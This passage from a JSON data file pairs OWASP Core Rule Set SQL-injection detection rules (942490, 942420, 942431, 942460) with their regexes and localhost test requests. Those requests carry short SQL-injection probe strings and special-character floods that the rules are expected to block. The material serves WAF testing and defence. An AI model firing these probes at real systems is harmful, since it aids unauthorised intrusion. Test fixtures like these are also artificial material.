3/3", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "'', '', '', '', '', '', '', '', 13" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "'', '', '', '', '', '', '', '', 13" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "`>65" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "`>65" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay='1001'='10" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay='1001'='10" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\"2562*23" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\"2562*23" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=\":[\"00" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=\":[\"00" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=`>6fbdec2" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=`>6fbdec2" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay='][0]]), strtolower($b[$GLOBALS['" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay='][0]]), strtolower($b[$GLOBALS['" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=', 2, 1" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=', 2, 1" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "`>9e7" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "`>9e7" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=\":\"65" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=\":\"65" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay='\\2nq5" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay='\\2nq5" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=` < 0) AND `" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=` < 0) AND `" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay='0:0:6" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay='0:0:6" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\":60" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\":60" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=\">%5 - type_submit_reset_5" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=\">%5 - type_submit_reset_5" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\":35" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\":35" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay='3085'='30" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay='3085'='30" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\":\"[0,\\x22" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\":\"[0,\\x22" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay='16/17" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay='16/17" } ] }, { "description": "classic SQL injection probings 3/3", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\";}7b6" }, "expected": { "should_block": true, "rule_ids": [ 942490 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\";}7b6" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1718, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[\\\"'`][\\s\\d]*?[^\\w\\s]\\W*?\\d\\W*?.*?[\\\"'`\\d]", "actions": [ { "act_name": "id", "lineno": 1719, "act_quote": "no_quote", "act_arg": "942490", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1720, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1721, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1722, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1723, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1723, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1724, "act_quote": "quotes", "act_arg": "Detects classic SQL injection probings 3/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1725, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1726, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1727, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1728, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1729, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1730, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1731, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1732, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1733, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1734, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1735, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1736, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1737, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1718 } }, { "rule_id": "942420", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){8})", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)", "logdata": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Cookie": "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942420 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1758, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){8})", "actions": [ { "act_name": "id", "lineno": 1759, "act_quote": "no_quote", "act_arg": "942420", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1760, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1761, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1762, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1763, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1763, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1764, "act_quote": "quotes", "act_arg": "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1765, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1766, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1767, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1768, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1769, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1770, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1771, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1772, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1773, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1774, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1775, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1776, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1777, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1758 } }, { "rule_id": "942431", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){6})", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)", "logdata": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=-------------------&var2=whatever" }, "expected": { "should_block": true, "rule_ids": [ 942431 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=-------------------&var2=whatever" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1787, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "((?:[~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>][^~!@#\\$%\\^&\\*\\(\\)\\-\\+=\\{\\}\\[\\]\\|:;\\\"'´’‘`<>]*?){6})", "actions": [ { "act_name": "id", "lineno": 1788, "act_quote": "no_quote", "act_arg": "942431", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1789, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1790, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1791, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1792, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1792, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1793, "act_quote": "quotes", "act_arg": "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1794, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1795, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1796, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1797, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1798, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1799, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1800, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1801, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1802, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1803, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1804, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1805, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1806, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1787 } }, { "rule_id": "942460", "has_tests": true, "detection": { "variables": [ { "name": "ARGS", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "\\W{4}", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Repetitive Non-Word Characters", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=foo...." }, "expected": { "should_block": true, "rule_ids": [ 942460 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=foo...." } ] }, { "description": "Repetitive Non-Word Characters negative test only 3 characters", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=foo..." }, "expected": { "should_block": false, "rule_ids": [ 942460 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=foo..." } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1829, "variables": [ { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\W{4}", "actions": [ { "act_name": "id", "lineno": 1830, "act_quote": "no_quote", "act_arg": "942460", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1831, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1832, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1833, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1834, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1835, "act_quote": "quotes", "act_arg": "Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1836, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1837, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1838, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1839, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1840, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1841, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1842, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1843, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1844, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1845, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1846, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1847, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1848, "act_quote": "quotes", 